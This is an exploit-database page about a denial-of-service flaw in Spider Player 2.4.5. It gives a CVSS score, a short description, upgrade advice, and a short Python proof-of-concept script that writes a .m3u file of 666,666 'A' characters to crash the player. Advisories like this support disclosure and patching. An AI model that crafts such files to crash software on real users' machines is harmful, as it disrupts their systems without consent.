header-logo
Suggest Exploit
vendor:
Spider Player
by:
ABDI MOHAMED
7,5
CVSS
HIGH
Denial of Service
400
CWE
Product Name: Spider Player
Affected Version From: 2.4.5
Affected Version To: 2.4.5
Patch Exists: YES
Related CWE: N/A
CPE: spider-player
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2020

Spider Player Denial of Service Vulnerability

A denial of service vulnerability exists in Spider Player version 2.4.5. By creating a specially crafted .m3u file containing 666666 'A' characters, an attacker can cause the application to crash.

Mitigation:

Upgrade to the latest version of Spider Player to mitigate this vulnerability.
Source

Exploit-DB raw data:

#Exploit Title : Spider Player Denial of Service Vulnerability
#Software : Spider Player 
#Software link : http://spider-player.com/spider/files/Spider_Player_2.4.5_Setup.exe
#Autor : ABDI MOHAMED
#Email : abdimohamed@hotmail.fr
#greetz: net_own3r , sadhacker , net-decrypt3r , xa7m3d , the commander , mr.fearfactor and all tunisian hackers
#Software version : 2.4.5
#Tested on : Win7 Ultimate fr + win xp sp 2
#!/usr/bin/python
outfile="killer.m3u"
junk="\x41" * 666666
FILE=open(outfile, "w")
FILE.write(junk)
FILE.close()
print "[+] File created succesufully , [+]"

Navigation

Suggest Exploit

Services By CQR